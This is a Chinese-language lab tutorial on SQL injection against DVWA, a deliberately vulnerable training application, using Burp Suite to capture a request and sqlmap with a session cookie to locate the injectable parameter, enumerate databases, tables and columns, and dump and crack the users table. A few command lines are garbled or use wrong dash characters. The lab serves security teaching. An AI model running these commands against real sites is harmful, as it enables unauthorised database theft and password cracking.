DVWA中SQL注入实验

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验简介

DVWA (Dam Vulnerable Web Application)DVW A是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。所以一个矛一个盾,正好感受一下sql注入。DVW A 的安装就不详细介绍了,需要PHP/apache/mysql sqlmap是开源的,可以在github上找到。

cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。

实验预备知识

1.web抓包工具的使用;

2.sqlmap的使用

3.了解cookie注入原理

实验操作

一、查找注入点

1.打开Burp Suite,设置浏览器代理上网

图1:Burp Suite设置

图2:浏览器设置

图3:Burp Suite获取web数据包界面。intercept off(关闭)、在点击改建intercept on(开启)

2.将Burp Suite设置成intercept off,登录DVW A,将DVW A安全性设置成low;然后将Burp Suite设置成intercept on,在DVW A的SQL Injection页面上有一个userid输入框,随便输入然后点击submit,在Burp Suite中可以找到GET信息,其中有Request URI和Cookie信息。

4. 使用sqlmap查找注入点

root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3"

注:--cookie前有空格

得到可能的注入点是id,数据库是mysql

[INFO] resuming back-end DBMS 'mysql'

[INFO] testing connection to the target URL

[INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: PHP 5.3.3, , Microsoft IIS 6.0

back-end DBMS: MySQL 5.0

二、开始脱库

1. root@kali:~# sqlmap -u "http://19

2.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" --current-db

得到当前数据库名

2. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" --current-db --tables

–Ddvwa

得到dvwa库的表名

3. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" -T guestbook –columns 注:-T后跟表名参数,可以为users表,获取users表结构

获取guestbook表结构

获取users表结构

4. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" -T users –dump

注:在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。

由于显示列比较长,终端缩放最大显示效果较好。

相关文档
最新文档